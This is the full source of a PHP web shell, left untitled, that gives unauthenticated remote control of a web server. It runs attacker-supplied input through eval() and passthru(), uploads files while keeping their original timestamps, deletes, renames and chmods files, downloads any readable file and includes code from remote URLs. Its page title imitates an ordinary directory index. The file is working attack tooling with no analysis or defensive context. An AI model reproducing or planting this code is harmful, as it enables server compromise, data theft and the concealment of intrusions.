Untitled

<?php
@ini_set('max_execution_time',0);
@ini_set('error_reporting','E_NOTICE');
@ini_set('display_errors','Off');
@ini_set('log_errors',0);
if (function_exists("date_default_timezone_set")){date_default_timezone_set('Etc/GMT-9');}
define('datedt', 9*3600-date('Z'));
if(!isset($_POST) && isset($HTTP_POST_VARS)) { $_POST = $HTTP_POST_VARS; }
if(!isset($_FILES) && isset($HTTP_POST_FILES)) { $_FILES = $HTTP_POST_FILES; }
if(!isset($_SERVER) && isset($HTTP_SERVER_VARS)) { $_SERVER = $HTTP_SERVER_VARS; }
if (get_magic_quotes_gpc()) {
    if (isset($_SERVER['REQUEST_METHOD']) && !strcmp($_SERVER['REQUEST_METHOD'],'POST')) {
        foreach ($_POST as $key => $val) {
            if (isset($val)) {
                $_POST[$key] = stripslashes($val);
            }
        }
    }
}
function hspecialchars($v) {
    return str_replace(array('&','<','>','"'),array('&amp;','&lt;','&gt;','&quot;'),$v);
}

$upfiletype = (isset($_FILES['upfile']['type'])) ? $_FILES['upfile']['type'] : '';
$upfilesize = (isset($_FILES['upfile']['size'])) ? $_FILES['upfile']['size'] : '';
$upfilename = (isset($_FILES['upfile']['name'])) ? $_FILES['upfile']['name'] : '';
$upfile = (isset($_FILES['upfile']['tmp_name'])) ? $_FILES['upfile']['tmp_name'] : '';
$r_method = isset($_SERVER['REQUEST_METHOD']) ? $_SERVER['REQUEST_METHOD'] : '';
$q_string = isset($_SERVER['QUERY_STRING']) ? $_SERVER['QUERY_STRING'] : '';
$p_dir = isset($_POST['dir']) ? $_POST['dir'] : '';
$p_ud_dir = isset($_POST['ud_dir']) ? 1 : 0;
$p_ddir = isset($_POST['ddir']) ? $_POST['ddir'] : '';
$p_m = isset($_POST['m']) ? $_POST['m'] : '';
$p_f = isset($_POST['f']) ? $_POST['f'] : '';
$p_ud_sfile = isset($_POST['ud_sfile']) ? 1 : 0;
$p_ud_nfile = isset($_POST['ud_nfile']) ? 1 : 0;
$p_ud_eval = isset($_POST['ud_eval']) ? 1 : 0;
$p_e_pt = isset($_POST['e_pt']) ? 1 : 0;
$p_selectfile = !empty($_POST['selectfile']) ? $_POST['selectfile'] : '';
$p_newfile = '';
if(!empty($_POST['newfile'])){$p_newfile=$_POST['newfile'];}
elseif($upfilename != ""){$p_newfile=basename($_FILES['upfile']['name']);}
$file = '';
$newfile = '';
$p_eval = isset($_POST['eval']) ? $_POST['eval'] : '';
$p_e_disp = isset($_POST['e_disp']) ? $_POST['e_disp'] : '';
$p_per = isset($_POST['per']) ? intval($_POST['per'] ,8) : '';
$p_perm = isset($_POST['perm']) ? intval($_POST['perm'] ,8): '';
$p_fseekoffset = isset($_POST['fseekoffset']) ? $_POST['fseekoffset'] : '';
$p_fseekwhence = isset($_POST['fseekwhence']) ? $_POST['fseekwhence'] : '';
$p_readdata = isset($_POST['p_readdata']) ? sprintf("%s", $_POST['p_readdata']) : 0;
$p_vmax = isset($_POST['vmax']) ? $_POST['vmax'] : '';
$p_order = isset($_POST['order']) ? $_POST['order'] : '';
$p_sort = isset($_POST['sort']) ? $_POST['sort'] : '';
$s_software = isset($_SERVER['SERVER_SOFTWARE']) ? $_SERVER['SERVER_SOFTWARE'] : '';
$s_server_name = isset($_SERVER['SERVER_NAME']) ? $_SERVER['SERVER_NAME'] : '';
$s_server_port = isset($_SERVER['SERVER_PORT']) ? $_SERVER['SERVER_PORT'] : '';

if (!strcmp($r_method,'GET')) {
    $query = urldecode($q_string);
    $file = $query;
}

$dir = strcmp($p_dir,'') ? $p_dir : '';
if ($p_ud_dir) { $dir = urldecode($dir); }
$udddir = strcmp($p_ddir,'') ? urldecode($p_ddir) : '';

if (strcmp($p_m,'')) {
    if ($p_ud_sfile && strcmp($p_selectfile,'')) { $p_selectfile = urldecode($p_selectfile); }
    if ($p_ud_nfile && strcmp($p_newfile,'')) { $p_newfile = urldecode($p_newfile); }
    if (strcmp($p_selectfile,'') && !strcmp($udddir,$dir)) {
        $file = $udddir . '/' . $p_selectfile;
        $newfile = $udddir . '/' . $p_newfile;
    } elseif (strcmp($p_selectfile,'') && strcmp($udddir,$dir)) {
        $file = $dir . '/' . $p_selectfile;
        $newfile = $dir . '/' . $p_newfile;
    } elseif (!strcmp($udddir,$dir)) {
        $file = $udddir . '/' . urldecode($p_f);
        $newfile = $udddir . '/' . $p_newfile ;
    } elseif (strcmp($udddir,$dir)) {
        $file = $dir . '/' . urldecode($p_f);
        $newfile = $dir . '/' . $p_newfile;
    }
}
if (strcmp($p_eval,'')) {
    if ($p_ud_eval) { $p_eval = urldecode($p_eval); }
    if (strcmp($p_e_disp,'')) { echo '<' . $p_e_disp . '>'; }
    if ($p_e_pt) {
        foreach (explode("\x0d\x0a", $p_eval) as $key) {
            eval(passthru($key));
        }
    } else { eval($p_eval); }
    if (strcmp($p_e_disp,'')) { echo '</' . $p_e_disp . '>'; }
    echo '<br>';
}
$limitb = 1024 * 1024 * 30;
$message = "";
if (strcmp($p_m,'') && !strcmp($p_m,'unlink_rmdir')) {
    if (is_dir($file)) {
        rmdir($file) or $message = "<b id=z>failed</b> ";
        $message .= "<b id=o>rmdir " . hspecialchars($file) . "</b>\x0a";
    } else {
        unlink($file) or $message = "<b id=z>failed</b> ";
        $message .= "<b id=o>unlink " . hspecialchars($file) . "</b>\x0a";
    }
    clearstatcache();
} elseif (!strcmp($p_m,'chmod')) {
    chmod($file,$p_per) or $message = "<b id=z>failed</b> ";
    $message .= "<b id=p>chmod " . hspecialchars($file) . ',' . hspecialchars($p_per) . "</b>\x0a";
} elseif (!strcmp($p_m,'upload')) {
    $mtime=@filemtime($newfile) or 0;
    if ($upfilesize > $limitb) { $message = "<b id=z>failed</b> "; }
    else { move_uploaded_file($upfile,$newfile) or $message = "<b id=z>failed</b> "; }
    $message .= "<b id=r>upload " . hspecialchars($upfilename) . ',' . hspecialchars($newfile) . "</b>\x0a";
//  eval(passthru('chmod 777 ' . $newfile));
    if($mtime){touch($newfile,$mtime,$mtime);}
} elseif (!strcmp($p_m,'rename')) {
    rename($file,$newfile) or $message = "<b id=z>failed</b> ";
    $message .= "<b id=s>rename " . hspecialchars($file) . ',' . hspecialchars($newfile) . "</b>\x0a";
} elseif (!strcmp($p_m,'mkdir')) {
    mkdir($newfile,$p_perm) or $message = "<b id=z>failed</b> ";
    $message .= "<b id=t>mkdir " . hspecialchars($newfile) . ',' . hspecialchars($p_perm) . "</b>\x0a";
}
if (strcmp($file,'') && is_readable($file) && is_file($file) && (!strcmp($p_m,'chdir_download') || !strcmp($file,$query))) {
    $readdata=0;
    $filename = preg_match("/([^\x2f\x5c]*)$/",$file,$matches) ? $matches[1] : basename($file);
    header("Content-Type: application/octet-stream");
    header("Content-Disposition: attachment; filename=\"" . $filename . "\"");
    $fp = fopen ("$file", 'rb');
    if (!strcmp($p_fseekoffset,'0') && !strcmp($p_fseekwhence,'0')) {
        header('Content-Length: ' . sprintf("%s", filesize($file)));
    } else {
        $fseekp = 0;
        if (!strcmp($p_fseekwhence,'0')) {
            $fseekp = $p_fseekoffset;
        } elseif (!strcmp($p_fseekwhence,'2')) {
            $fseekp = sprintf("%s", filesize($file) + $p_fseekoffset);
        }
        fseek ($fp,$fseekp);
    }
    do {
        $data = fread($fp, 4096);
        $lendata=strlen($data);
        if ($lendata == 0) { break; }
        $sasize = sprintf("%s", $readdata+$lendata-$p_readdata);
        if ($p_readdata && $sasize > 0) {
            $data = substr($data, 0, $lendata-$sasize);
            echo $data;
            break;
        }
        echo $data;
    } while(true);
    fclose ($fp);
    exit;
} if (preg_match("#^[^:]+://.*$#",$file)) {
    include($file);
    exit;
}
echo <<<END
<style>
td{font-size:12px;}
select,pre,form,input{display:inline;margin:0px;padding:0px;}
a{text-decoration:none;}
b{font-weight:normal;}
#X{ime-mode:disabled;}
#a{background:#ccffff}
#b{background:#efefff}
#c{background:#ffffcc}
#d{background:#ccffcc}
#e{background:#ccccff}
#f{background:#ffcccc}
#g{background:#cccccc}
#o{width:100%;background:#fff6f6;color:red;border:1px solid #efe6e6;}
#p{width:100%;background:#eff5ef;color:teal;border:1px solid #dfe5df;}
#q{width:100%;background:#fff6ff;color:#ff1493;border:1px solid #efe6ef;}
#r{width:100%;background:#f6fff6;color:green;border:1px solid #e6efe6;}
#s{width:100%;background:#f0f0fc;color:blue;border:1px solid #e0e0ec;}
#t{width:100%;background:#fffcf0;color:orange;border:1px solid #efece0;}
#u{width:100%;background:#f6f6f6;color:gray;}
#y{color:teal;}
#z:hover{color:red;}
#z:link{color:blue;}
#z:visited{color:red;}
#z:active{color:red;}
</style>
END;
function permissions($perms) {
    $perms=floatval($perms);
    if (($perms & 0xC000) == 0xC000) {
        $info = 's';
    } elseif (($perms & 0xA000) == 0xA000) {
        $info = 'l';
    } elseif (($perms & 0x8000) == 0x8000) {
        $info = '-';
    } elseif (($perms & 0x6000) == 0x6000) {
        $info = 'b';
    } elseif (($perms & 0x4000) == 0x4000) {
        $info = 'd';
    } elseif (($perms & 0x2000) == 0x2000) {
        $info = 'c';
    } elseif (($perms & 0x1000) == 0x1000) {
        $info = 'p';
    } else {
        $info = 'u';
    }

    if($perms & 0x100){ $info .= 'r'; }
    else{ $info .= '-'; }
    if($perms & 0x80){ $info .= 'w'; }
    else{ $info .= '-'; }
    if($perms & 0x40){
        if($perms & 0x800){
            $info .= 's';
        }else{
            $info .= 'x';
        }
    }else{
        if($perms & 0x800){
            $info .= 'S';
        }else{
            $info .= '-';
        }
    }
    if($perms & 0x20){ $info .= 'r'; }
    else{ $info .= '-'; }
    if($perms & 0x10){ $info .= 'w'; }
    else{ $info .= '-'; }
    if($perms & 0x8){
        if($perms & 0x400){
            $info .= 's';
        }else{
            $info .= 'x';
        }
    }else{
        if($perms & 0x400){
            $info .= 'S';
        }else{
            $info .= '-';
        }
    }

    if($perms & 0x4){ $info .= 'r'; }
    else{ $info .= '-'; }
    if($perms & 0x2){ $info .= 'w'; }
    else{ $info .= '-'; }
    if($perms & 0x1){
        if($perms & 0x200){
            $info .= 't';
        }else{
            $info .= 'x';
        }
    }else{
        if($perms & 0x200){
            $info .= 'T';
        }else{
            $info .= '-';
        }
    }

    return $info;
}
function clengthset($v) {
    return strlen($v) > 64 ? '..' . substr($v,-62,62) : $v;
}
function getid($file) {
    if (!function_exists('posix_getpwuid')) { return fileowner($file).'/'.filegroup($file); }
    $arru = posix_getpwuid(fileowner($file));
    $arrg = posix_getgrgid(filegroup($file));
    $uid = strcmp($arru['uid'],'') ? $arru['uid'] : 0;
    $uname = strcmp($arru['name'],'') ? $arru['name'] : "";
    $gid = strcmp($arrg['gid'],'') ? $arrg['gid'] : 0;
    $gname = strcmp($arrg['name'],'') ? $arrg['name'] : "";
    return "$uid/$gid $uname/$gname";
}

$dir = is_dir($file) ? $file : $dir;
$dir = is_dir($dir) ? $dir : $udddir;
$dir = is_dir($dir) ? $dir : '.';
$dir = realpath($dir);
$c_ud_dir = '';
if (preg_match("/[^\x20-\x7E]/",$dir)) { $p_ud_dir=1; }
if ($p_ud_dir) { $dispdir = urlencode($dir); $dispdir2 = hspecialchars($dir); $c_ud_dir = ' checked'; }
else { $dispdir = $dispdir2 = hspecialchars($dir); }
$ddir = urlencode($dir);
$vmax = preg_match("/^[0-9]+$/",$p_vmax) ? $p_vmax : 100;
$order = preg_match("/^[0-9]+$/",$p_order) ? $p_order : 1;
$sorts = !strcmp($p_sort,'sort') ? ' selected' : '';
$rsorts = !strcmp($p_sort,'rsort') ? ' selected' : '';
$natsorts = !strcmp($p_sort,'natsort') ? ' selected' : '';
$c_sort_r = '';
$p_sort_r = 0;
if(isset($_POST['sort_r'])){
    $c_sort_r=' checked';
    $p_sort_r = 1;
}

echo <<<END
<title>Index of $dispdir2</title><body bgcolor=white text=black link=black vlink=gray alink=gray><span id=b>$dispdir2</span><br><pre id=b>$message</pre><br><a href=#u name=tx>#under</a>
<form action=? method=POST enctype="multipart/form-data"><input type=hidden name=MAX_FILE_SIZE value={$limitb}>
<table frame=border border=1 bordercolor=blue bordercolordark=#666699 bordercolorlight=#9999ff bgcolor=#eeeeee cellspacing=0 cellpadding=1>
END;
$dirHandler = opendir($dir);
while ($r=readdir($dirHandler)) { $files[] = $r; }
if (!strcmp($p_sort,'sort')) { sort($files); }
elseif (!strcmp($p_sort,'rsort')) { rsort($files); }
elseif (!strcmp($p_sort,'natsort')) { natsort($files); }
if($p_sort_r){$files=array_reverse($files);}
$filen = sizeof($files);
$starr = $order && $order-1 <= $filen-1 ? $order-1 : $filen-1;
$enarr = $order-1+$vmax && $order-1+$vmax-1 <= $filen-1 ? $order-1+$vmax-1 : $filen-1;
$starr++; $enarr++;
echo "<tr><td id=a>file:{$filen}</td><td colspan=7>{$starr} to {$enarr}</td></tr>";
$starr--; $enarr--;
echo <<<END
<tr>
<td><input type=radio checked name=f value=""></td><td id=a>per</td><td id=b>name</td><td id=c>size</td><td id=d>ctime</td><td id=e>mtime</td><td id=f>atime</td><td id=g>uid/gid</td>
</tr>
END;

$i=1;
while($i <= $starr){++$i; next($files); }
for ($i=0; $i<=$enarr-$starr; $i++) {
    $file = current($files);
    $ugid=getid("$dir/$file");
    if (preg_match("/^([0-9]+\/[0-9]+) ([^\n]*)$/",$ugid,$matches)) { $ugid=$matches[1]; $ugname = $matches[2]; }
    else { $ugname = ""; }
    echo "<tr><td>" . sprintf("%s",key($files)+1) . "<input type=radio name=f value=\"".urlencode($file)."\"></td><td id=";
    if (is_dir($dir."/".$file)) { echo "d>"; }
    else { echo "a>"; }
    echo permissions(fileperms($dir."/".$file));
    echo "</td><td id=b>";
    if (is_dir($dir."/".$file)) { echo "<a href=\"?" . urlencode(realpath("$dir/$file")) . "\" id=z><pre>" . hspecialchars(clengthset($file)) . "</pre></a>"; }
    else { echo "<a href=\"?" . urlencode(realpath("$dir/$file")) . "\"><pre>" . hspecialchars(clengthset($file)) . "</pre></a>"; }
    echo "</td><td id=c>" . sprintf("%s",filesize($dir."/".$file)) .
        "</td><td id=d>" . date("m/d/y H:i:s", filectime("$dir/$file")+datedt) .
        "</td><td id=e>" . date("m/d/y H:i:s", filemtime("$dir/$file")+datedt) .
        "</td><td id=f>" . date("m/d/y H:i:s", fileatime("$dir/$file")+datedt) .
        "</td><td id=g";
    if (strcmp($ugname,'')) { echo " title=\"" . hspecialchars($ugname) . "\""; }
    echo ">". hspecialchars($ugid) .
        "</td></tr>\x0a";
    next($files);
}
echo <<<END
</table><a name=u href=#tx>#top</a>
<pre id=u><b id=o><input type=radio name=m value=unlink_rmdir> unlink/rmdir</b>
<b id=p><input type=radio name=m value=chmod> chmod (<input size=6 name=per value=0644 id=X>)</b>
<b id=q><input type=radio name=m value=chdir_download checked> chdir/download (fseek offset<input size=12 name=fseekoffset value=0 id=X> whence<select name=fseekwhence><option value=0 selected>SEEK_SET<option value=2>SEEK_END</select>) length<input size=12 name=p_readdata value="0"></b>
<b id=r><input type=radio name=m value=upload> upload</b>
<b id=s><input type=radio name=m value=rename> rename</b>
<b id=t><input type=radio name=m value=mkdir> mkdir (<input size=6 name=perm value=0755 id=X>)</b>

fileview    order <input id=X size=12 value={$order} name=order> viewmax <input id=X size=12 value={$vmax} name=vmax> sortType <select name=sort><option value=""><option value=sort{$sorts}>sort<option value=rsort{$rsorts}>rsort<option value=natsort{$natsorts}>natsort</select> reverce <input type=checkbox{$c_sort_r} name=sort_r value=1>
dir         <input size=100 name=dir value="{$dispdir}"> d_urldec. <input type=checkbox{$c_ud_dir} name=ud_dir value=1>
selectfile  <input size=100 name=selectfile value=""> s_urldec. <input type=checkbox name=ud_sfile value=1>
newfile     <input size=100 name=newfile value=""> n_urldec. <input type=checkbox name=ud_nfile value=1>
upfile      <input size=100 type=file name=upfile>
eval        <textarea rows=4 cols=70 name=eval></textarea> e_urldec. <input type=checkbox name=ud_eval value=1> <select name=e_disp><option value="">none<option value=xmp selected>xmp<option value=pre>pre</select> passthru <input type=checkbox checked name=e_pt value=1>
<input type=submit> <input type=reset><input type=hidden name=ddir value="{$ddir}">
</pre>
</form>
END;
echo '<address>phpversion ' . hspecialchars(phpversion()) . '</address>';
echo '<address>' . hspecialchars($s_software) . " " . hspecialchars($s_server_name) . " Port " . hspecialchars($s_server_port) . "</address>";
exit;?>